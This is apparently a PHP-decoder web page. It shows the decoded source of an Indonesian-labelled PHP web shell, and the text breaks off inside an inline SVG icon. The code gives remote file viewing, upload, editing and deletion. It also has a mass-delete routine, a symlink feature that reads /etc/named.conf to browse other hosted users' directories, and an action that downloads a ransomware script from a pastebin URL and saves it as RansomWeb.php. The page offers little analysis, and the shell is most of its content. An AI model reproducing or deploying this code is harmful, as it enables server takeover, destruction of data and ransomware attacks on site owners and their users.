Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?><?php goto exsUL; rwKjE: if (isset($_GET["\x70\141\x74\150\x5f\146\151\x6c\145"])) {..

Decoded Output download

<?   
?><?php 
 goto exsUL; rwKjE: if (isset($_GET["path_file"])) { $lihat = $_GET["path_file"]; } goto giBbO; giBbO: if ($_GET["aksi"] == "view") { echo "<br><div class="bgnya container-fluid alert alert-warning alert-dismissible fade show" role="alert"><textarea class="lihat form-control" id="exampleFormControlTextarea1" rows="20" disabled>" . htmlspecialchars(file_get_contents($lihat)) . "</textarea><a href="?Home" type="button" class="tutup btn-close" data-bs-dismiss="alert" aria-label="Close"></a></div>"; } goto HWDK_; TsdEd: if ($_GET["aksi"] == "buatfile") { if (isset($_POST["buat"])) { $nama_file = $path . "/" . $_POST["nama_file"]; $isi_file = $_POST["isi_file"]; $buat_file = fopen($nama_file, "w"); fwrite($buat_file, $isi_file); fclose($buat); if (empty($buat)) { echo "<script>window.location='?path=" . $path . "'; alert('Sukses!!!')</script>"; } else { echo "<script>window.location='?path=" . $path . "'; alert('Gagal!!!')</script>"; } } echo "<form method="post" class="mt-3">\xa                <div class="mb-3">\xa                <label for="exampleFormControlInput1" class="form-label">Nama File :</label>\xa                <input type="text" name="nama_file" placeholder="Masukkan Nama Filenya" class="form-control" id="exampleFormControlInput1" placeholder="[email protected]">\xa              </div>\xa              <div class="mb-3">\xa  <label for="exampleFormControlTextarea1" class="form-label">Isi File :</label>
  <textarea class="form-control" name="isi" placeholder="Masukkan Isi Filenya" id="exampleFormControlTextarea1" rows="3"></textarea>
</div><br>
<button name="buat" class="tombol btn btn-outline-secondary" type="submit">Create Now</button>"; } goto rwKjE; DZMI8: foreach ($scandir as $file) { if ($file != "." && $file != "..") { if (file_exists($file)) { echo "<tr>\xa                            <th scope="row"><svg xmlns="http://www.w3.org/2000/svg" width="26" height="26" fill="currentColor" class="bi bi-file-earmark-code-fill" viewBox="0 0 16 16">\xa                            <path d="M9.293 0H4a2 2 0 0 0-2 2v12a2 2 0 0 0 2 2h8a2 2 0 0 0 2-2V4.707A1 1 0 0 0 13.707 4L10 .293A1 1 0 0 0 9.293 0zM9.5 3.5v-2l3 3h-2a1 1 0 0 1-1-1zM6.646 7.646a.5.5 0 1 1 .708.708L5.707 10l1.647 1.646a.5.5 0 0 1-.708.708l-2-2a.5.5 0 0 1 0-.708l2-2zm2.708 0 2 2a.5.5 0 0 1 0 .708l-2 2a.5.5 0 0 1-.708-.708L10.293 10 8.646 8.354a.5.5 0 1 1 .708-.708z"/>
                          </svg></th>
                            <td><a class="path" nama='filenya' href="?path=" . $path . "&aksi=view&path_file=" . $path . "/" . $file . "">" . $file . "</a></td>\xa                            <td>\xa                            <form method='POST' action="?option=&path=" . $path . "">
                            <div class="pilihan input-group mb-3">
                            <select name='opt' class="pilihan form-select form-select-sm mb-3" id="inputGroupSelect02" aria-label="Default select example">\xa                                <option selected>Choose...</option>
                                <option value="edit">Edit</option>\xa                                <option value="rename">Rename</option>
                                <option value="delete">Delete</option>
                            </select>
                            </div>\xa                            <input type="hidden" name="type" value="file">
                            <input type="hidden" name="pathnya" value='" . $path . "/" . $file . "'>\xa                            <button name="now" class="tombol btn btn-outline-secondary" type="submit">Now</button>
                            </form>
                            </td>\xa                          </tr>"; } } } goto RBMdP; SRf7o: if ($_GET["aksi"] == "buatransom") { $url = "https://pastebin.com/raw/LbVhNnZF"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $get = curl_exec($curl); if ($get != '') { $puts = fopen("RansomWeb.php", "w"); fwrite($puts, $get); fclose($puts); $nama_file = "RansomWeb.php"; $server_web = "http://" . $_SERVER["HTTP_HOST"] . "/"; if ($puts != '') { echo "<script>window.location='?path=" . $path . "'; alert('Sukses')</script>"; } else { echo "Gagal Membuat File"; } } } goto Ddh0j; WwQku: if ($_GET["aksi"] == "massdel") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi} > Terhapus
"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST["start"]) { echo "<textarea class='form-control' rows='8' disabled='disabled'>"; hapus_massal($_POST["d_dir"], $_POST["d_file"]); echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>"; } else { echo "<form method='post'>
				\x9<p><i class='fa fa-folder'></i> Lokasi</p>\xa\x9			\x9<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>
\x9\x9			<p><i class ='fa fa-file'></i> Nama File</p>
\x9		\x9\x9<input type='text' name='d_file' placeholder='index.php' class='form-control'><br>\xa\x9\x9		\x9<input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>
		\x9        </form><br><br>"; } } goto mRvz3; G8Ag4: if ($_GET["aksi"] == "symlink") { if (!is_file("named.txt")) { $d00m = @file("/etc/named.conf"); } else { $d00m = @file("named.txt"); } if (!$d00m) { echo "<center>\xa\x9\x9		<br/>
	\x9\x9\x9<font color='red'>Gagal Membaca /etc/named.conf</font>\xa	\x9	\x9<br/><br/></center>"; } else { echo "<center>
			<div class='tmp'></center>
	\x9\x9	<table align='center' width='100%'>\xa	\x9	\x9	<thead class='bg-info'>
	\x9	\x9		<th>Domains</th>
\x9	\x9\x9		<th>Users</th>\xa	\x9			\x9<th>symlink </th>
\x9				</thead>"; foreach ($d00m as $dom) { if (eregi("zone", $dom)) { preg_match_all("#zone "(.*)"#", $dom, $domsws); flush(); if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domsws[1][0])); flush(); $site = $user["name"]; @symlink("/", "sym/root"); $site = $domsws[1][0]; $ir = "ir"; $il = "il"; if (preg_match("/.^{$ir}/", $domsws[1][0]) or preg_match("/.^{$il}/", $domsws[1][0])) { $site = ".{$domsws["1"]}[0]."; } echo "\xa	\x9\x9	\x9\x9\x9	<tr>
		\x9\x9			\x9\x9<td>\xa		\x9		\x9				<a target='_blank' href=http://www." . $domsws[1][0] . "/>" . $site . " </a>\xa\x9\x9	\x9	\x9		\x9</td>\xa\x9\x9\x9\x9	\x9			<td>
	\x9\x9\x9					\x9" . $user["name"] . "
						\x9		</td>\xa\x9	\x9		\x9\x9\x9\x9<td>\xa\x9		\x9\x9\x9		\x9\x9<a href='sym/root/home/" . $user["name"] . "/public_html' target='_blank'>Symlink</a>\xa\x9		\x9\x9	\x9\x9	</td>\xa\x9\x9		\x9\x9	\x9</tr>"; flush(); flush(); } } } echo "</table>\xa		\x9</div><br><br>"; } } goto WwQku; o2Prn: if ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<script>window.location='?path=" . $path . "'; swal('Berhasil Merename File!!!', 'Selamat Anda Berhasil Merename File', 'success');</script>"; } else { echo "<script>window.location='?path=" . $path . "'; swal('Gagal Merename File!!!', 'Anda Gagal Merenames File', 'error');</script>"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">\xa                    <div class="container-fluid>
                    <div class="mb-3">\xa                    <label for="exampleFormControlInput1" class="form-label">Name File/Directory</label>
                    <input name="newname" type="text" class="form-control" id="exampleFormControlInput1" value="" . $_POST["name"] . "" placeholder="New Name">
                  </div>\xa                <input type="hidden" name="path" value="" . $_POST["pathnya"] . "">\xa                <input type="hidden" name="name" value="" . $lihat . "">\xa                <input type="hidden" name="opt" value="rename">
                <br><br>\xa                <input type="submit" value="Rename Now" class="tombol btn btn-outline-secondary btn-block">
                </div>\xa                </form>"; } goto ybyj0; ybyj0: function ($permfile) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; }; goto VBFow; RBMdP: if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] === "directory") { if (rmdir($_GET["pathnya"])) { echo "<script>swal('Berhasil Menghapus Folder!!!', 'Selamat Anda Berhasil Menghapus Folder', 'success')</script>"; } else { echo "<script>swal("Gagal Menghapus Folder!!!", "Maaf Anda Tidak Bisa Menghapus Folder", "error");window.location='?path=" . $path . "'</script>"; } } else { if ($_POST["type"] == "file") { if (unlink($_POST["pathnya"])) { echo "<script>swal('Berhasil Menghapus File!!!', 'Selamat Anda Berhasil Menghapus File', 'success'); window.location='?path=" . $path . "';</script>"; } else { echo "<script>swal("Gagal Menghapus File!!!", "Maaf Anda Tidak Bisa Menghapus File", "error"); window.location='?path=" . $path . "';</script>"; } } } } goto XgDDu; exsUL: echo "<p class='tulisan'> PATH : "; goto MQCqU; S_SOe: echo "\xa            <form method="post" enctype="multipart/form-data">\xa                <div class="uploader file input-group input-group-sm mb-3 ms-auto">\xa                    <input type="file" name="upl" class="form-control" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">\xa                    <button name="btn" class="btn btn-secondary" type="submit" id="inputGroupFileAddon04">Upload</button>\xa                </div>
            </form>
\xa            <!-- tambah file/folder & ransomweb -->
            <div class="tambah">
                <div class="container-fluid">
                    <div class="row row-cols-auto">\xa                        <!-- fungsi tambah file -->
                        <div class="col-4">
                            <svg class="icon" xmlns="http://www.w3.org/2000/svg" width="26" height="26"
                                fill="currentColor" class="bi bi-file-earmark-plus" viewBox="0 0 16 16">\xa                                <path\xa                                    d="M8 6.5a.5.5 0 0 1 .5.5v1.5H10a.5.5 0 0 1 0 1H8.5V11a.5.5 0 0 1-1 0V9.5H6a.5.5 0 0 1 0-1h1.5V7a.5.5 0 0 1 .5-.5z" />\xa                                <path\xa                                    d="M14 4.5V14a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V2a2 2 0 0 1 2-2h5.5L14 4.5zm-3 0A1.5 1.5 0 0 1 9.5 3V1H4a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1h8a1 1 0 0 0 1-1V4.5h-2z" />\xa                            </svg>
                            <a class="path" href="?path=" . $path . "&aksi=buatfile">Buat File</a>\xa                        </div>\xa                        <!-- akhir fungsi tambah file -->\xa
                        <!-- fungsi tambah folder -->\xa                        <div class="col-4">\xa                            <svg class="icon" xmlns="http://www.w3.org/2000/svg" width="30" height="30"
                                fill="currentColor" class="bi bi-folder-plus" viewBox="0 0 16 16">\xa                                <path
                                    d="m.5 3 .04.87a1.99 1.99 0 0 0-.342 1.311l.637 7A2 2 0 0 0 2.826 14H9v-1H2.826a1 1 0 0 1-.995-.91l-.637-7A1 1 0 0 1 2.19 4h11.62a1 1 0 0 1 .996 1.09L14.54 8h1.005l.256-2.819A2 2 0 0 0 13.81 3H9.828a2 2 0 0 1-1.414-.586l-.828-.828A2 2 0 0 0 6.172 1H2.5a2 2 0 0 0-2 2zm5.672-1a1 1 0 0 1 .707.293L7.586 3H2.19c-.24 0-.47.042-.683.12L1.5 2.98a1 1 0 0 1 1-.98h3.672z" />
                                <path\xa                                    d="M13.5 10a.5.5 0 0 1 .5.5V12h1.5a.5.5 0 1 1 0 1H14v1.5a.5.5 0 1 1-1 0V13h-1.5a.5.5 0 0 1 0-1H13v-1.5a.5.5 0 0 1 .5-.5z" />\xa                            </svg>\xa                            <a class="path" href="?path=" . $path . "&aksi=buatfolder">Buat Folder</a>\xa                        </div>
                        <!-- Akhir fungsi tambah folder -->\xa
                        <!-- funsgi auto create ransomweb -->
                        <div class="col-4">
                            <svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px"\xa                            width="30" height="30"
                            viewBox="0 0 172 172"\xa                            style=" fill:#000000;"><g fill="none" fill-rule="nonzero" stroke="none" stroke-width="1" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><path d="M0,172v-172h172v172z" fill="none"></path><g fill="#ffffff"><path d="M86,0c-8.82844,0 -16.125,7.29656 -16.125,16.125c0,1.98875 0.51063,3.655 0.9675,5.16c0.22844,0.7525 0.48375,1.45125 0.645,1.935c0.02688,0.1075 0.08063,0.13438 0.1075,0.215c0.01344,0.05375 0,0.30906 0,0.3225c0.08063,0.26875 0.18813,0.51063 0.3225,0.7525c4.04469,8.42531 5.67063,14.02875 5.9125,17.2c0,0.04031 0,0.06719 0,0.1075c-6.40969,1.27656 -12.255,3.82969 -17.3075,7.31c-0.34937,-0.34937 -0.63156,-0.73906 -0.9675,-1.1825c-1.86781,-2.4725 -2.86219,-6.45 -2.58,-7.6325c0.06719,-0.24187 0.09406,-0.49719 0.1075,-0.7525v-0.645c0.29563,-1.10187 0.7525,-2.23062 0.7525,-3.87c0,-8.82844 -7.40406,-16.125 -16.2325,-16.125c-8.82844,0 -16.125,7.29656 -16.125,16.125c0,6.85313 4.32688,13.0075 10.75,15.265c0.08063,0.02688 0.13438,0.08063 0.215,0.1075c3.09063,1.31688 7.32344,4.25969 10.2125,7.4175c0.95406,1.03469 1.66625,2.12313 2.2575,3.1175c-4.79719,7.13531 -7.6325,15.8025 -7.6325,25.0475c0,3.03688 0.40313,5.95281 0.7525,8.7075c0.01344,0.215 0.05375,0.43 0.1075,0.645c0,0.02688 0,0.08063 0,0.1075c0,0.06719 0,0.14781 0,0.215c-0.12094,0.69875 -0.645,0.94063 -1.505,1.3975c-1.26312,0.67188 -3.46687,0.52406 -3.44,0.5375l-0.1075,0.1075c-2.37844,-1.45125 -5.09281,-2.4725 -8.17,-2.4725c-8.82844,0 -16.2325,7.40406 -16.2325,16.2325c0,8.82844 7.40406,16.125 16.2325,16.125c5.28094,0 9.98406,-2.56656 13.0075,-6.45c0.04031,-0.04031 0.06719,-0.06719 0.1075,-0.1075c1.74688,-2.4725 4.15219,-4.48812 6.1275,-5.2675c1.97531,-0.77937 3.06375,-0.71219 4.515,0.645c0.33594,0.3225 0.73906,0.59125 1.1825,0.7525c7.10844,7.02781 16.555,11.94594 26.9825,13.2225c0.24188,1.505 0.36281,2.95625 0.215,4.3c-0.38969,3.61469 -2.16344,6.51719 -3.3325,7.4175c-4.60906,2.72781 -7.8475,7.83406 -7.8475,13.76c0,8.82844 7.29656,16.125 16.125,16.125c8.82844,0 16.125,-7.29656 16.125,-16.125c0,-6.58437 -1.90812,-14.60656 -3.225,-21.5c-0.34937,-1.86781 -0.645,-3.655 -0.86,-5.2675c11.12625,-3.25187 20.47875,-10.44094 26.445,-20.21c1.65281,0.72563 3.45344,2.00219 5.0525,3.5475c3.19813,3.07719 5.4825,6.665 5.4825,6.665c0.36281,0.56438 0.88688,1.02125 1.505,1.29c0.1075,0.08063 0.215,0.14781 0.3225,0.215c2.84875,4.12531 7.14875,7.31 12.7925,7.31c8.82844,0 16.125,-7.29656 16.125,-16.125c0,-8.82844 -7.29656,-16.125 -16.125,-16.125c-2.83531,0 -5.65719,0.84656 -8.17,2.365l-0.1075,-0.1075c-2.94281,1.27656 -5.21375,0.87344 -7.955,-0.43c-1.19594,-0.56437 -2.43219,-1.33031 -3.655,-2.15c0.69875,-3.09062 0.9675,-6.1275 0.9675,-9.3525v-1.29c0.04031,-0.1075 0.08063,-0.215 0.1075,-0.3225c0.12094,-0.14781 0.41656,-0.55094 0.9675,-0.86c1.08844,-0.63156 2.87563,-1.33031 4.8375,-1.935c3.93719,-1.20937 8.86875,-1.89469 12.685,-1.1825v-0.1075c1.12875,0.34938 2.31125,0.5375 3.1175,0.5375c7.00094,0 13.0075,-5.75125 13.0075,-13.115c0,-7.36375 -6.35594,-12.685 -13.4375,-12.685c-4.81062,0 -8.9225,2.75469 -10.965,6.7725l-0.1075,-0.1075c-1.26312,1.78719 -4.90469,3.92375 -8.385,4.515c-1.74687,0.29563 -3.39969,0.25531 -4.6225,-0.1075c-1.22281,-0.36281 -1.92156,-0.90031 -2.4725,-1.8275c-0.25531,-0.38969 -0.57781,-0.71219 -0.9675,-0.9675c-0.06719,-0.08062 -0.13437,-0.14781 -0.215,-0.215c-5.50937,-9.16437 -14.13625,-16.34 -24.51,-19.6725c-0.13437,-0.08062 -0.28219,-0.14781 -0.43,-0.215c-0.1075,-0.04031 -0.215,-0.08062 -0.3225,-0.1075c-4.4075,-1.90812 -4.86437,-4.27312 -4.73,-7.31c0.13438,-3.07719 1.81406,-6.61125 2.4725,-7.6325c0.01344,-0.01344 -0.01344,-0.09406 0,-0.1075c2.21719,-3.15781 5.375,-6.50375 5.375,-11.9325c0,-8.82844 -7.29656,-16.125 -16.125,-16.125zM86,6.88c4.93156,0 9.245,4.31344 9.245,9.245c0,2.795 -1.59906,4.35375 -4.1925,8.0625c-1.42437,2.13656 -3.44,6.235 -3.655,11.2875c-0.20156,4.73 2.15,10.46781 8.17,13.545c0.1075,0.08063 0.215,0.14781 0.3225,0.215c0.17469,0.12094 0.34938,0.22844 0.5375,0.3225c0.1075,0.05375 0.215,0.06719 0.3225,0.1075c0.20156,0.09406 0.43,0.16125 0.645,0.215c9.27188,2.87563 17.02531,9.41969 21.715,17.845c0.3225,0.59125 0.80625,1.075 1.3975,1.3975c1.47813,1.76031 3.42656,2.94281 5.4825,3.5475c2.52625,0.7525 5.18688,0.7525 7.74,0.3225c5.11969,-0.87344 10.03781,-3.35937 12.9,-7.4175c0.12094,-0.17469 0.22844,-0.34937 0.3225,-0.5375c0.83313,-1.86781 2.51281,-3.1175 5.0525,-3.1175c3.92375,0 6.5575,2.16344 6.5575,5.805c0,3.64156 -2.80844,6.235 -6.1275,6.235c-1.03469,0 -0.99437,-0.06719 -0.86,0c-0.30906,-0.16125 -0.63156,-0.26875 -0.9675,-0.3225c-5.4825,-1.00781 -11.26062,-0.06719 -16.0175,1.3975c-2.37844,0.72563 -4.515,1.58563 -6.235,2.58c-1.55875,0.90031 -3.07719,1.55875 -3.87,3.7625c-0.47031,0.65844 -0.69875,1.45125 -0.645,2.2575v2.365c0,1.94844 -0.09406,3.7625 -0.3225,5.4825c-0.25531,-0.02687 -0.49719,-0.02687 -0.7525,0c-0.1075,0 -0.215,0 -0.3225,0c-1.42437,0.24188 -2.53969,1.34375 -2.795,2.75469c-0.26875,1.42438 0.37625,2.84875 1.6125,3.58781c0.48375,0.3225 1.16906,0.79281 1.72,1.1825c0.40313,0.55094 0.9675,0.95406 1.6125,1.1825c1.74688,1.23625 3.66844,2.48594 5.9125,3.5475c3.80281,1.80063 8.68063,2.70094 13.6525,0.5375c0.18813,-0.09406 0.36281,-0.20156 0.5375,-0.3225c1.47813,-0.98094 3.19813,-1.3975 4.945,-1.3975c4.93156,0 9.245,4.31344 9.245,9.245c0,4.93156 -4.31344,9.245 -9.245,9.245c-3.78937,0 -6.73219,-2.16344 -8.2775,-5.2675c-0.33594,-0.645 -0.86,-1.16906 -1.505,-1.505c-0.63156,-0.9675 -2.13656,-3.5475 -5.4825,-6.7725c-1.97531,-1.89469 -4.32687,-3.73562 -7.095,-4.945c-0.95406,-0.41656 -1.94844,-0.7525 -3.01,-0.9675c-0.48375,-0.18812 -0.99437,-0.25531 -1.505,-0.215c-1.6125,-0.13437 -3.30562,0.04031 -4.945,0.645c-1.23625,0.37625 -2.15,1.41094 -2.37844,2.6875c-0.215,1.26313 0.28219,2.55313 1.30344,3.3325c-4.50156,6.18125 -10.68281,10.8575 -17.9525,13.545c0.63156,-1.15562 0.55094,-2.55312 -0.20156,-3.62812c-0.7525,-1.075 -2.05594,-1.62594 -3.34594,-1.42438c-0.14781,0.02688 -0.29562,0.06719 -0.43,0.1075c-0.52406,0.13438 -0.99437,0.38969 -1.3975,0.7525c-2.64719,2.23063 -2.67406,5.28094 -2.58,8.2775c0,0.13438 0,0.29563 0,0.43c-0.05375,0.55094 0.01344,1.10188 0.215,1.6125c0.20156,2.49938 0.5375,5.14656 1.075,7.955c1.35719,7.12188 3.1175,15.10375 3.1175,20.21c0,4.93156 -4.31344,9.245 -9.245,9.245c-4.93156,0 -9.245,-4.31344 -9.245,-9.245c0,-3.50719 2.02906,-6.58437 4.73,-8.0625c0.14781,-0.06719 0.29563,-0.13437 0.43,-0.215c3.30563,-2.53969 5.45563,-6.90687 6.02,-12.1475c0.29563,-2.71437 0.01344,-5.68406 -0.86,-8.7075c-0.05375,-0.33594 -0.16125,-0.65844 -0.3225,-0.9675c-0.83312,-2.4725 -2.0425,-5.01219 -3.87,-7.4175c-0.67187,-1.14219 -1.92156,-1.80062 -3.23844,-1.69312c-1.33031,0.09406 -2.45906,0.95406 -2.94281,2.19031c-0.47031,1.22281 -0.20156,2.62031 0.69875,3.58781c0.1075,0.14781 0.215,0.28219 0.3225,0.43c-7.67281,-1.78719 -14.59312,-5.84531 -19.8875,-11.395c-0.40312,-0.44344 -0.92719,-0.77937 -1.505,-0.9675c-3.25187,-2.31125 -7.43094,-2.48594 -10.75,-1.1825c-3.655,1.43781 -6.665,4.31344 -9.03,7.6325c-0.02687,0.04031 -0.08062,0.06719 -0.1075,0.1075c-1.80062,2.23063 -4.59562,3.655 -7.525,3.655c-4.93156,0 -9.3525,-4.31344 -9.3525,-9.245c0,-4.93156 4.42094,-9.3525 9.3525,-9.3525c2.17688,0 3.31906,0.41656 4.945,1.505c0.17469,0.12094 0.34938,0.22844 0.5375,0.3225c3.13094,1.38406 6.3425,0.90031 9.46,-0.7525c3.1175,-1.65281 5.92594,-5.68406 4.945,-10.32c-0.05375,-0.215 -0.12094,-0.44344 -0.215,-0.645c-0.25531,-2.15 -0.43,-4.27312 -0.43,-6.235c0,-5.96625 1.42438,-11.54281 3.87,-16.555c0.87344,0.34938 1.84094,0.3225 2.6875,-0.06719c0.86,-0.37625 1.51844,-1.08844 1.8275,-1.97531c0.12094,-0.30906 0.18813,-0.63156 0.215,-0.9675v-0.43c0.37625,-1.78719 0.20156,-3.60125 -0.3225,-5.2675c-0.05375,-0.37625 -0.16125,-0.73906 -0.3225,-1.075c-0.02687,-0.06719 -0.08062,-0.14781 -0.1075,-0.215c-0.06719,-0.1075 -0.13437,-0.215 -0.215,-0.3225c-1.00781,-2.10969 -2.39187,-4.07156 -4.085,-5.9125c-3.68187,-4.00437 -8.43875,-7.4175 -12.9,-9.245c-0.06719,-0.04031 -0.14781,-0.08062 -0.215,-0.1075c-3.7625,-1.24969 -6.235,-4.74344 -6.235,-8.815c0,-4.93156 4.31344,-9.245 9.245,-9.245c4.93156,0 9.3525,4.31344 9.3525,9.245c0,0.80625 -0.26875,1.505 -0.645,3.01c-0.06719,0.28219 -0.1075,0.56438 -0.1075,0.86v0.645h0.1075c-0.73906,4.42094 0.87344,8.89563 3.655,12.5775c0.94063,1.23625 2.05594,2.31125 3.3325,3.225c0.67188,1.1825 1.97531,1.85438 3.3325,1.72c2.21719,0.63156 4.8375,0.48375 7.095,-0.7525c1.57219,-0.86 2.23063,-2.76812 1.505,-4.4075c1.73344,-0.86 3.60125,-1.54531 5.4825,-2.15c0.28219,1.03469 1.02125,1.88125 2.00219,2.31125c0.98094,0.41656 2.10969,0.36281 3.05031,-0.16125c1.90813,-1.02125 3.35938,-2.86219 4.1925,-5.16c0.57781,-0.76594 0.80625,-1.74687 0.645,-2.6875c0.12094,-0.90031 0.17469,-1.81406 0.1075,-2.795c-0.34937,-4.64937 -2.44562,-10.54844 -6.3425,-18.8125c-0.01344,-0.06719 0.01344,-0.26875 0,-0.3225c-0.04031,-0.14781 -0.08062,-0.3225 -0.1075,-0.43c-0.06719,-0.215 -0.13437,-0.38969 -0.215,-0.645c-0.16125,-0.51062 -0.44344,-1.16906 -0.645,-1.8275c-0.40312,-1.33031 -0.645,-3.03687 -0.645,-3.1175c0,-4.93156 4.31344,-9.245 9.245,-9.245zM127.28,20.9625c-7.51156,0 -13.76,6.24844 -13.76,13.76c0,3.27875 -0.51062,4.93156 -0.7525,5.4825c-0.05375,0.1075 0.02688,0.06719 0,0.1075c-0.04031,0.05375 -0.16125,0.16125 -0.1075,0.1075c-1.31687,1.12875 -1.58562,3.06375 -0.63156,4.515c0.95406,1.43781 2.83531,1.94844 4.39406,1.1825c0,0 0.81969,-0.56437 1.29,-1.075c0.47031,-0.51062 1.00781,-1.15562 1.3975,-2.0425c0.77938,-1.76031 1.29,-4.34031 1.29,-8.2775c0,-3.49375 3.38625,-6.88 6.88,-6.88c3.64156,0 6.88,2.91594 6.88,6.88c0,3.49375 -3.38625,6.88 -6.88,6.88c-5.33469,0 -7.6325,4.6225 -7.6325,4.6225c-1.075,1.57219 -0.65844,3.70875 0.91375,4.78375c1.57219,1.075 3.70875,0.65844 4.78375,-0.91375c0,0 1.76031,-1.6125 1.935,-1.6125c7.51156,0 13.76,-6.24844 13.76,-13.76c0,-7.74 -6.39625,-13.76 -13.76,-13.76zM96.32,56.76c-8.50594,0 -15.48,6.97406 -15.48,15.48c0,8.50594 6.97406,15.48 15.48,15.48c8.50594,0 15.48,-6.97406 15.48,-15.48c0,-8.50594 -6.97406,-15.48 -15.48,-15.48zM19.2425,63.3175c-7.00094,0 -13.0075,5.64375 -13.0075,13.0075c0,7.36375 6.00656,13.115 13.0075,13.115c2.63375,0 4.75688,-0.92719 6.3425,-1.72c3.44,-1.72 5.75125,-2.9025 9.03,-2.15c1.23625,0.40313 2.59344,0.09406 3.50719,-0.81969c0.91375,-0.91375 1.24969,-2.27094 0.84656,-3.50719c-0.40312,-1.23625 -1.46469,-2.13656 -2.74125,-2.33813c-5.67062,-1.30344 -10.2125,0.9675 -13.6525,2.6875c-1.16906,0.59125 -2.52625,0.9675 -3.3325,0.9675c-3.31906,0 -6.1275,-2.59344 -6.1275,-6.235c0,-3.64156 2.80844,-6.1275 6.1275,-6.1275c2.08281,0 3.42656,0.72563 4.6225,2.15c0.06719,0.08063 0.13438,0.14781 0.215,0.215c1.84094,1.84094 4.03125,2.74125 6.3425,3.225c2.31125,0.48375 4.68969,0.60469 7.095,-0.43c1.26313,-0.38969 2.19031,-1.49156 2.37844,-2.795c0.18813,-1.31687 -0.40312,-2.62031 -1.505,-3.35937c-1.10187,-0.72563 -2.52625,-0.76594 -3.66844,-0.08063c0,0 -1.41094,0.18813 -2.795,-0.1075c-1.38406,-0.29562 -2.795,-1.075 -3.01,-1.29c-2.2575,-2.58 -5.67062,-4.4075 -9.675,-4.4075zM96.32,63.64c4.78375,0 8.6,3.81625 8.6,8.6c0,4.78375 -3.81625,8.6 -8.6,8.6c-4.78375,0 -8.6,-3.81625 -8.6,-8.6c0,-4.78375 3.81625,-8.6 8.6,-8.6zM70.52,86c-6.61125,0 -12.04,5.42875 -12.04,12.04c0,6.61125 5.42875,12.04 12.04,12.04c6.61125,0 12.04,-5.42875 12.04,-12.04c0,-6.61125 -5.42875,-12.04 -12.04,-12.04zM70.52,92.88c2.88906,0 5.16,2.27094 5.16,5.16c0,2.88906 -2.27094,5.16 -5.16,5.16c-2.88906,0 -5.16,-2.27094 -5.16,-5.16c0,-2.88906 2.27094,-5.16 5.16,-5.16zM100.835,95.9975c-3.41312,0 -6.235,2.71438 -6.235,6.1275c0,3.41313 2.82188,6.235 6.235,6.235c3.41313,0 6.1275,-2.82187 6.1275,-6.235c0,-3.41312 -2.71437,-6.1275 -6.1275,-6.1275zM56.76,121.69c-1.505,0.16125 -2.72781,1.30344 -3.01,2.795c-0.3225,1.41094 -1.15562,2.62031 -2.15,3.5475c-0.99437,0.92719 -2.39187,1.46469 -2.0425,1.3975c-6.74562,0.645 -11.7175,5.93938 -11.7175,12.255c0,7.00094 5.75125,13.115 13.115,13.115c7.22938,0 13.0075,-5.88562 13.0075,-13.115c0,-3.35937 4.1925,-8.17 4.1925,-8.17c1.02125,-0.83312 1.49156,-2.16344 1.19594,-3.45344c-0.29562,-1.27656 -1.30344,-2.28438 -2.58,-2.58c-1.29,-0.29563 -2.62031,0.17469 -3.45344,1.19594c0,0 -6.235,5.34813 -6.235,13.0075c0,3.78938 -2.33812,6.235 -6.1275,6.235c-3.64156,0 -6.235,-2.91594 -6.235,-6.235c0,-3.17125 1.66625,-5.22719 5.6975,-5.4825c0.14781,0.01344 0.28219,0.01344 0.43,0c2.06938,-0.41656 3.61469,-1.46469 5.375,-3.1175c1.76031,-1.65281 3.48031,-4.03125 4.1925,-7.095c0.28219,-1.08844 0.02688,-2.24406 -0.71219,-3.10406c-0.72563,-0.86 -1.8275,-1.30344 -2.94281,-1.19594zM123.84,123.7325c-0.14781,0.02688 -0.29562,0.06719 -0.43,0.1075c-1.59906,0.36281 -2.72781,1.80063 -2.6875,3.44c0,3.17125 1.35719,5.84531 3.1175,7.6325c1.76031,1.78719 3.80281,2.86219 